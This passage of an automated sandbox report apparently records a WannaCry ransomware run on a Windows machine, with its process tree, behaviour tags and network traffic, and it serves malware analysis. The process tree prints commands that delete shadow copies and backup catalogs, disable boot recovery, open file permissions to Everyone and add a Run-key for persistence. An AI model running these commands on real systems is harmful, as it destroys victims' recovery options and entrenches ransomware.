  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5812 /prefetch:1
  2⤵
  PID:2960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1732 /prefetch:1
  2⤵
  PID:2732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3016 /prefetch:1
  2⤵
  PID:1908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
  2⤵
  PID:2060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6288 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6456 /prefetch:8
  2⤵
  PID:4968
- C:\Users\Admin\Downloads\WannaCry.EXE
  "C:\Users\Admin\Downloads\WannaCry.EXE"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  - System Location Discovery: System Language Discovery
  PID:3560
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h .
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:4308
- - C:\Windows\SysWOW64\icacls.exe
    icacls . /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:3116
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 53481729199101.bat
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4324
  - - C:\Windows\SysWOW64\cscript.exe
      cscript.exe //nologo m.vbs
      4⤵
      System Location Discovery: System Language Discovery
      PID:1580
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s F:\$RECYCLE
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1132
- - C:\Users\Admin\Downloads\@WanaDecryptor@.exe
    @WanaDecryptor@.exe co
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2636
  - - C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe
      TaskData\Tor\taskhsvc.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1996
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /b @WanaDecryptor@.exe vs
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4104
  - - C:\Users\Admin\Downloads\@WanaDecryptor@.exe
      @WanaDecryptor@.exe vs
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:3004
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:952
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3116
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5032
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@WanaDecryptor@.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1744
- - C:\Users\Admin\Downloads\@WanaDecryptor@.exe
    @WanaDecryptor@.exe
    3⤵
    - Executes dropped EXE
    - Sets desktop wallpaper using registry
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1144
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "xinooffmkqlv074" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1892
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "xinooffmkqlv074" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:4692
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:488
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@WanaDecryptor@.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:796
- - C:\Users\Admin\Downloads\@WanaDecryptor@.exe
    @WanaDecryptor@.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2024
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@WanaDecryptor@.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2020
- - C:\Users\Admin\Downloads\@WanaDecryptor@.exe
    @WanaDecryptor@.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2956
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:196
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@WanaDecryptor@.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4124
- - C:\Users\Admin\Downloads\@WanaDecryptor@.exe
    @WanaDecryptor@.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1368
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5608 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3076

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4188

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1388

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2204

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4380

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\PopSync.docx" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3092

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3976855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:4336

Network

DNS

google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

google.com

IN A

Response

google.com

IN A

172.217.169.78
DNS

google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

google.com

IN A

Response

google.com

IN A

142.250.179.238
DNS

136.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

136.32.126.40.in-addr.arpa

IN PTR

Response
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

www.bing.com

Remote address:

8.8.8.8:53

Request

www.bing.com

IN A

Response

www.bing.com

IN CNAME

www-www.bing.com.trafficmanager.net

www-www.bing.com.trafficmanager.net

IN CNAME

www.bing.com.edgekey.net

www.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

92.123.128.172

e86303.dscx.akamaiedge.net

IN A

92.123.128.174

e86303.dscx.akamaiedge.net

IN A

92.123.128.178

e86303.dscx.akamaiedge.net

IN A

92.123.128.176

e86303.dscx.akamaiedge.net

IN A

92.123.128.177

e86303.dscx.akamaiedge.net

IN A

92.123.128.182

e86303.dscx.akamaiedge.net

IN A

92.123.128.175

e86303.dscx.akamaiedge.net

IN A

92.123.128.181

e86303.dscx.akamaiedge.net

IN A

92.123.128.173
DNS

www.bing.com

Remote address:

8.8.8.8:53

Request

www.bing.com

IN A

Response

www.bing.com

IN CNAME

www-www.bing.com.trafficmanager.net

www-www.bing.com.trafficmanager.net

IN CNAME

www.bing.com.edgekey.net

www.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

92.123.128.194

e86303.dscx.akamaiedge.net

IN A

92.123.128.132

e86303.dscx.akamaiedge.net

IN A

92.123.128.195

e86303.dscx.akamaiedge.net

IN A

92.123.128.192

e86303.dscx.akamaiedge.net

IN A

92.123.128.135

e86303.dscx.akamaiedge.net

IN A

92.123.128.191

e86303.dscx.akamaiedge.net

IN A

92.123.128.190

e86303.dscx.akamaiedge.net

IN A

92.123.128.133

e86303.dscx.akamaiedge.net

IN A

92.123.128.134
DNS

th.bing.com

Remote address:

8.8.8.8:53

Request

th.bing.com

IN A

Response

th.bing.com

IN CNAME

p-th.bing.com.trafficmanager.net

p-th.bing.com.trafficmanager.net

IN CNAME

th.bing.com.edgekey.net

th.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

92.123.128.178

e86303.dscx.akamaiedge.net

IN A

92.123.128.177

e86303.dscx.akamaiedge.net

IN A

92.123.128.183

e86303.dscx.akamaiedge.net

IN A

92.123.128.187

e86303.dscx.akamaiedge.net

IN A

92.123.128.174

e86303.dscx.akamaiedge.net

IN A

92.123.128.185

e86303.dscx.akamaiedge.net

IN A

92.123.128.182

e86303.dscx.akamaiedge.net

IN A

92.123.128.176

e86303.dscx.akamaiedge.net

IN A

92.123.128.175
DNS

178.128.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

178.128.123.92.in-addr.arpa

IN PTR

Response

178.128.123.92.in-addr.arpa

IN PTR

a92-123-128-178deploystaticakamaitechnologiescom
DNS

login.microsoftonline.com

Remote address:

8.8.8.8:53

Request

login.microsoftonline.com

IN A

Response

login.microsoftonline.com

IN CNAME

login.mso.msidentity.com

login.mso.msidentity.com

IN CNAME

ak.privatelink.msidentity.com

ak.privatelink.msidentity.com

IN CNAME

www.tm.ak.prd.aadg.trafficmanager.net

www.tm.ak.prd.aadg.trafficmanager.net

IN A

40.126.32.138

www.tm.ak.prd.aadg.trafficmanager.net

IN A

40.126.32.74

www.tm.ak.prd.aadg.trafficmanager.net

IN A

20.190.160.22

www.tm.ak.prd.aadg.trafficmanager.net

IN A

40.126.32.133

www.tm.ak.prd.aadg.trafficmanager.net

IN A

40.126.32.136

www.tm.ak.prd.aadg.trafficmanager.net

IN A

20.190.160.17

www.tm.ak.prd.aadg.trafficmanager.net

IN A

20.190.160.20

www.tm.ak.prd.aadg.trafficmanager.net

IN A

40.126.32.134
DNS

login.live.com

Remote address:

8.8.8.8:53

Request

login.live.com

IN A

Response

login.live.com

IN CNAME

login.msa.msidentity.com

login.msa.msidentity.com

IN CNAME

www.tm.lg.prod.aadmsa.trafficmanager.net

www.tm.lg.prod.aadmsa.trafficmanager.net

IN CNAME

prdv4a.aadg.msidentity.com

prdv4a.aadg.msidentity.com

IN CNAME

www.tm.v4.a.prd.aadg.trafficmanager.net

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

40.126.32.134

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

20.190.160.20

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

40.126.32.68

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

40.126.32.136

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

20.190.160.14

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

40.126.32.72

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

20.190.160.17

www.tm.v4.a.prd.aadg.trafficmanager.net

IN A

20.190.160.22
DNS

www2.bing.com

Remote address:

8.8.8.8:53

Request

www2.bing.com

IN A

Response

www2.bing.com

IN CNAME

www2-www2.bing.com.trafficmanager.net

www2-www2.bing.com.trafficmanager.net

IN CNAME

www-bing-com.dual-a-0001.a-msedge.net

www-bing-com.dual-a-0001.a-msedge.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
DNS

nexusrules.officeapps.live.com

Remote address:

8.8.8.8:53

Request

nexusrules.officeapps.live.com

IN A

Response

nexusrules.officeapps.live.com

IN CNAME

prod.nexusrules.live.com.akadns.net

prod.nexusrules.live.com.akadns.net

IN A

52.111.243.30
DNS

github.com

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
DNS

avatars.githubusercontent.com

Remote address:

8.8.8.8:53

Request

avatars.githubusercontent.com

IN A

Response

avatars.githubusercontent.com

IN A

185.199.110.133

avatars.githubusercontent.com

IN A

185.199.109.133

avatars.githubusercontent.com

IN A

185.199.108.133

avatars.githubusercontent.com

IN A

185.199.111.133
DNS

github-cloud.s3.amazonaws.com

Remote address:

8.8.8.8:53

Request

github-cloud.s3.amazonaws.com

IN A

Response

github-cloud.s3.amazonaws.com

IN CNAME

s3-1-w.amazonaws.com

s3-1-w.amazonaws.com

IN CNAME

s3-w.us-east-1.amazonaws.com

s3-w.us-east-1.amazonaws.com

IN A

52.217.172.177

s3-w.us-east-1.amazonaws.com

IN A

3.5.24.80

s3-w.us-east-1.amazonaws.com

IN A

3.5.27.248

s3-w.us-east-1.amazonaws.com

IN A

16.15.216.154

s3-w.us-east-1.amazonaws.com

IN A

54.231.163.241

s3-w.us-east-1.amazonaws.com

IN A

52.216.141.196

s3-w.us-east-1.amazonaws.com

IN A

52.217.73.4

s3-w.us-east-1.amazonaws.com

IN A

54.231.165.209
DNS

133.110.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.110.199.185.in-addr.arpa

IN PTR

Response

133.110.199.185.in-addr.arpa

IN PTR

cdn-185-199-110-133githubcom
DNS

collector.github.com

Remote address:

8.8.8.8:53

Request

collector.github.com

IN A

Response

collector.github.com

IN CNAME

glb-db52c2cf8be544.github.com

glb-db52c2cf8be544.github.com

IN A

140.82.112.22
DNS

210.156.26.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

210.156.26.20.in-addr.arpa

IN PTR

Response
DNS

officeclient.microsoft.com

Remote address:

8.8.8.8:53

Request

officeclient.microsoft.com

IN A

Response

officeclient.microsoft.com

IN CNAME

config.officeapps.live.com

config.officeapps.live.com

IN CNAME

prod.configsvc1.live.com.akadns.net

prod.configsvc1.live.com.akadns.net

IN CNAME

europe.configsvc1.live.com.akadns.net

europe.configsvc1.live.com.akadns.net

IN CNAME

neu-azsc-config.officeapps.live.com

neu-azsc-config.officeapps.live.com

IN A

52.109.76.240
DNS

roaming.officeapps.live.com

Remote address:

8.8.8.8:53

Request

roaming.officeapps.live.com

IN A

Response

roaming.officeapps.live.com

IN CNAME

prod.roaming1.live.com.akadns.net

prod.roaming1.live.com.akadns.net

IN CNAME

eur.roaming1.live.com.akadns.net

eur.roaming1.live.com.akadns.net

IN CNAME

weu-azsc-000.roaming.officeapps.live.com

weu-azsc-000.roaming.officeapps.live.com

IN CNAME

osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com

osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com

IN A

52.109.89.19
DNS

27.178.89.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

27.178.89.13.in-addr.arpa

IN PTR

Response
DNS

ocsp.digicert.com

Remote address:

8.8.8.8:53

Request

ocsp.digicert.com

IN A

Response

ocsp.digicert.com

IN CNAME

ocsp.edge.digicert.com

ocsp.edge.digicert.com

IN CNAME

fp2e7a.wpc.2be4.phicdn.net

fp2e7a.wpc.2be4.phicdn.net

IN CNAME

fp2e7a.wpc.phicdn.net

fp2e7a.wpc.phicdn.net

IN A

192.229.221.95
DNS

fp.msedge.net

Remote address:

8.8.8.8:53

Request

fp.msedge.net

IN A

Response

fp.msedge.net

IN CNAME

1.perf.msedge.net

1.perf.msedge.net

IN CNAME

a-0019.a-msedge.net

a-0019.a-msedge.net

IN CNAME

a-0019.a.dns.azurefd.net

a-0019.a.dns.azurefd.net

IN CNAME

a-0019.standard.a-msedge.net

a-0019.standard.a-msedge.net

IN A

204.79.197.222
GET

https://www.bing.com/qbox?query=&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&oit=0

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /qbox?query=&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&oit=0 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 270
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117ba5fa2841b4a206a81b22b4c8af
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-46kaSIouZg5AFGEiSJvW1mKW+vn8xCTbU9REB7IXVJU='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:03:33 GMT
set-cookie: MUID=37F6CDC49CF46A2F007CD8DF9D9A6B67; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:33 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=37F6CDC49CF46A2F007CD8DF9D9A6B67; expires=Tue, 11-Nov-2025 21:03:33 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=37BEF8E0AB1C6BDC0D7CEDFBAA726AAB; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:33 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:33 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:33 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=6172AFC61CE646958BAB97B7C7E06E41&dmnchg=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:33 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241017; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:33 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:33 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=37BEF8E0AB1C6BDC0D7CEDFBAA726AAB; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199013.1490b32b
GET

https://www.bing.com/qbox?query=o&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=2455b8af9e784c348470511fd44c7c35&oit=1&cp=1&pgcl=4

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /qbox?query=o&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=2455b8af9e784c348470511fd44c7c35&oit=1&cp=1&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 437
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117ba7f36448d2952fd3fa1a1a4ec5
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-JKnEAG98TCuDyWhSmLiNGTUI7fse7ar9q2HIqlYNYHM='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:03:35 GMT
set-cookie: MUID=0A1F349F5D016ED0187121845CAB6F24; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=0A1F349F5D016ED0187121845CAB6F24; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=12710C2489D0668F0740193F887A67AC; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=02F6B70EB79D426E87A41F74C13882F5&dmnchg=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241017; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=12710C2489D0668F0740193F887A67AC; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199015.1490be61
GET

https://www.bing.com/qbox?query=on&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=fae02e03ae6d473a9a7fe4907c1ced86&oit=1&cp=2&pgcl=4

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /qbox?query=on&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=fae02e03ae6d473a9a7fe4907c1ced86&oit=1&cp=2&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 467
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117ba7d5504c7bbd5ec6971facf1d7
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-j1GlTHfr/w++b33K0h+FmLPlToWsljzOblqdCj80haE='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:03:35 GMT
set-cookie: MUID=2E6648D6A91E64E502E15DCDA8B165B3; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=2E6648D6A91E64E502E15DCDA8B165B3; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=0E71753757FC6A4E0DD8602C56536B8D; domain=.bing.com; path=/; HttpOnly
